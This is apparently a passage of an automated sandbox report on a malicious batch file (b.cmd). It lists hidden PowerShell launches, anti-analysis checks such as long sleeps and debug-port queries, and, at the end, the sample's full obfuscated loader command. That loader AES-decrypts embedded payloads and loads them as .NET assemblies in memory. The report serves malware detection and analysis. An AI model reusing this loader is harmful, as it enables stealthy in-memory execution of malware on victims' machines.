Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6178Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3692Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5502Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1071Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4080Thread sleep count: 6178 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2736Thread sleep count: 3692 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2664Thread sleep time: -11990383647911201s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6284Thread sleep count: 5502 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5772Thread sleep time: -2767011611056431s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6284Thread sleep count: 1071 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3760Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Globalization\Sorting\sortdefault.nlsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SYSTEM32\MSVFW32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SYSTEM32\en-US\avicap32.dll.muiJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SYSTEM32\en-US\MSVFW32.dll.muiJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorwks.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\wbem\en-US\wmiutils.dll.muiJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c \"set __=^&rem\Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\b.cmd" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c \"set __=^&rem\Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\b.cmd';$rWNT='DecpxHCopxHCmppxHCrespxHCspxHC'.Replace('pxHC', ''),'MaTGyrinTGyrMTGyroTGyrdTGyrulTGyreTGyr'.Replace('TGyr', ''),'CrYsKteYsKtateYsKtDYsKteYsKtcrYsKtypYsKttoYsKtrYsKt'.Replace('YsKt', ''),'Idnlzndnlzvdnlzokdnlzednlz'.Replace('dnlz', ''),'TraGoiknsfGoikoGoikrmFGoikinaGoiklBlGoikockGoik'.Replace('Goik', ''),'LoStkNadStkN'.Replace('StkN', ''),'FroMxWcmBaMxWcse6MxWc4StMxWcriMxWcngMxWc'.Replace('MxWc', ''),'EnrgYjtrrgYjyrgYjPorgYjinrgYjtrgYj'.Replace('rgYj', ''),'CqJGUopqJGUyqJGUTqJGUoqJGU'.Replace('qJGU', ''),'ElywTEeywTEmenywTEtAywTEtywTE'.Replace('ywTE', ''),'ReaMpXgdLMpXgineMpXgsMpXg'.Replace('MpXg', ''),'CeuHLheuHLangeuHLeExeuHLteeuHLnseuHLioneuHL'.Replace('euHL', ''),'SKlTEpliKlTEtKlTE'.Replace('KlTE', ''),'GzasmetzasmCuzasmrrzasmentzasmPrzasmocezasmszasmszasm'.Replace('zasm', '');powershell -w hidden;function OgEIm($Xyfkn){$KStrb=[System.Security.Cryptography.Aes]::Create();$KStrb.Mode=[System.Security.Cryptography.CipherMode]::CBC;$KStrb.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$KStrb.Key=[System.Convert]::($rWNT[6])('xA1+WTJaPCUsOeL/aM8gYjpdFXCHAzsSe7O9jqgG6tE=');$KStrb.IV=[System.Convert]::($rWNT[6])('o+k4tdVDsXdevRbseXqo5Q==');$OoABI=$KStrb.($rWNT[2])();$gCRFY=$OoABI.($rWNT[4])($Xyfkn,0,$Xyfkn.Length);$OoABI.Dispose();$KStrb.Dispose();$gCRFY;}function bkQvC($Xyfkn){$pXxPg=New-Object System.IO.MemoryStream(,$Xyfkn);$ztkwM=New-Object System.IO.MemoryStream;$RxDER=New-Object System.IO.Compression.GZipStream($pXxPg,[IO.Compression.CompressionMode]::($rWNT[0]));$RxDER.($rWNT[8])($ztkwM);$RxDER.Dispose();$pXxPg.Dispose();$ztkwM.Dispose();$ztkwM.ToArray();}$QaWhK=[System.IO.File]::($rWNT[10])([Console]::Title);$TOEth=bkQvC (OgEIm ([Convert]::($rWNT[6])([System.Linq.Enumerable]::($rWNT[9])($QaWhK, 5).Substring(2))));$kobGz=bkQvC (OgEIm ([Convert]::($rWNT[6])([System.Linq.Enumerable]::($rWNT[9])($QaWhK, 6).Substring(2))));[System.Reflection.Assembly]::($rWNT[5])([byte[]]$kobGz).($rWNT[7]).($rWNT[3])($null,$null);[System.Reflection.Assembly]::($rWNT[5])([byte[]]$TOEth).($rWNT[7]).($rWNT[3])($null,$null); "Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hiddenJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo $host.ui.rawui.windowtitle='c:\users\user\desktop\b.cmd';$rwnt='decpxhcopxhcmppxhcrespxhcspxhc'.replace('pxhc', ''),'matgyrintgyrmtgyrotgyrdtgyrultgyretgyr'.replace('tgyr', ''),'cryskteysktateysktdyskteysktcrysktypyskttoysktryskt'.replace('yskt', ''),'idnlzndnlzvdnlzokdnlzednlz'.replace('dnlz', ''),'tragoiknsfgoikogoikrmfgoikinagoiklblgoikockgoik'.replace('goik', ''),'lostknadstkn'.replace('stkn', ''),'fromxwcmbamxwcse6mxwc4stmxwcrimxwcngmxwc'.replace('mxwc', ''),'enrgyjtrrgyjyrgyjporgyjinrgyjtrgyj'.replace('rgyj', ''),'cqjguopqjguyqjgutqjguoqjgu'.replace('qjgu', ''),'elywteeywtemenywtetaywtetywte'.replace('ywte', ''),'reampxgdlmpxginempxgsmpxg'.replace('mpxg', ''),'ceuhlheuhlangeuhleexeuhlteeuhlnseuhlioneuhl'.replace('euhl', ''),'sklteplikltetklte'.replace('klte', ''),'gzasmetzasmcuzasmrrzasmentzasmprzasmocezasmszasmszasm'.replace('zasm', '');powershell -w hidden;function ogeim($xyfkn){$kstrb=[system.security.cryptography.aes]::create();$kstrb.mode=[system.security.cryptography.ciphermode]::cbc;$kstrb.padding=[system.security.cryptography.paddingmode]::pkcs7;$kstrb.key=[system.convert]::($rwnt[6])('xa1+wtjapcusoel/am8gyjpdfxchazsse7o9jqgg6te=');$kstrb.iv=[system.convert]::($rwnt[6])('o+k4tdvdsxdevrbsexqo5q==');$ooabi=$kstrb.($rwnt[2])();$gcrfy=$ooabi.($rwnt[4])($xyfkn,0,$xyfkn.length);$ooabi.dispose();$kstrb.dispose();$gcrfy;}function bkqvc($xyfkn){$pxxpg=new-object system.io.memorystream(,$xyfkn);$ztkwm=new-object system.io.memorystream;$rxder=new-object system.io.compression.gzipstream($pxxpg,[io.compression.compressionmode]::($rwnt[0]));$rxder.($rwnt[8])($ztkwm);$rxder.dispose();$pxxpg.dispose();$ztkwm.dispose();$ztkwm.toarray();}$qawhk=[system.io.file]::($rwnt[10])([console]::title);$toeth=bkqvc (ogeim ([convert]::($rwnt[6])([system.linq.enumerable]::($rwnt[9])($qawhk, 5).substring(2))));$kobgz=bkqvc (ogeim ([convert]::($rwnt[6])([system.linq.enumerable]::($rwnt[9])($qawhk, 6).substring(2))));[system.reflection.assembly]::($rwnt[5])([byte[]]$kobgz).($rwnt[7]).($rwnt[3])($null,$null);[system.reflection.assembly]::($rwnt[5])([byte[]]$toeth).($rwnt[7]).($rwnt[3])($null,$null); "
